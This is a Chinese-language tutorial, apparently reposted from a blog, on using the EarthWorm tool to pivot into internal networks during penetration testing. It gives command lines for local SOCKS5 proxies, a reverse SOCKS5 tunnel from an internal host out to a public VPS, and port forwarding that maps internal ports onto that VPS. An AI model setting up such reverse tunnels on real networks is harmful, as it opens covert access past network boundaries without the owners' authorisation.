ew代理实战

前言

渗透内网代理必不可少,本文做个记录

正文

工具下载地址

http://rootkiter.com/EarthWorm/

ssocksd开启 socks5 代理

环境

代理:192.168.211.131

首先使用

 ./ew_for_linux64 -s ssocksd -l 12345

在  192.168.211.131:12345 开启了 socks5 代理,设置 proxifier

然后在  192.168.211.131 上监听一个端口, 在 192.168.211.1 使用代理连过去。

可以看到 在 192.168.211.131 收到的连接是由代理服务器 192.168.211.131 发起的

反弹 socks5 代理到公网vps

此时我们可以访问 公网vps, 通过在内网主机反弹 socks5 到公网,然后使用公网的 socks5 服务,连入内网。

首先在公网主机

./ew_for_linux64 -s rcsocks -l 1080 -e 8888

-l  本地监听端口,待会连接这个端口作为 socks5 端口
-e  反弹中转端口

在内网主机

./ew_for_linux64 -s rssocks -d vps_ip -e 8888

-d 指定反弹的主机,这里为 公网 vps 的 ip
-e 指定反弹中转端口,和vps中的设置的一样

此时 vps_ip:1080 开启了 socks5 代理,设置 proxifier

此时通过代理访问

利用lcx_tran端口转发转接socks代理

通过 192.168.211.1311088 端口使用 192.168.211.1329999 端口提供的 socks5 代理。

192.168.211.131 执行

./ew_for_linux64 -s lcx_tran -l 1088 -f 192.168.211.132 -g 9999

将来自 1088 的数据转发至 192.168.211.132:9999 

192.168.211.132 执行

ew_for_Win.exe -s ssocksd -l 9999

然后使用 192.168.211.131:1088 作为 socks5 代理即可

lcx_slave 反向端口转发

使用 lcx_slave 实现将内网端口映射到公网。

首先在公网主机

./ew_for_linux64 -s lcx_listen -l 12234 -e 8989

lcx_listen 本地端口转发,将 12234 转发到 8989

然后在内网主机

ew_for_Win.exe -s lcx_slave -d vps_ip -e 8989 -f 127.0.0.1 -g 9999

lcx_slave 将 vps_ip:8989 的数据转发至   127.0.0.1:9999

然后访问 vps_ip:12234 就是访问 内网主机ip:9999


【参数说明】

ssocksd 本地 socks代理
rssocks 反弹 socks代理

lcx_slave  将远程主机的端口 与 另一台主机建立联系
lcx_tran  将本地端口转发至远程主机
lcx_listen 本地端口转发,本地端口之间建立转发关系
原文地址:https://www.cnblogs.com/hac425/p/9416925.html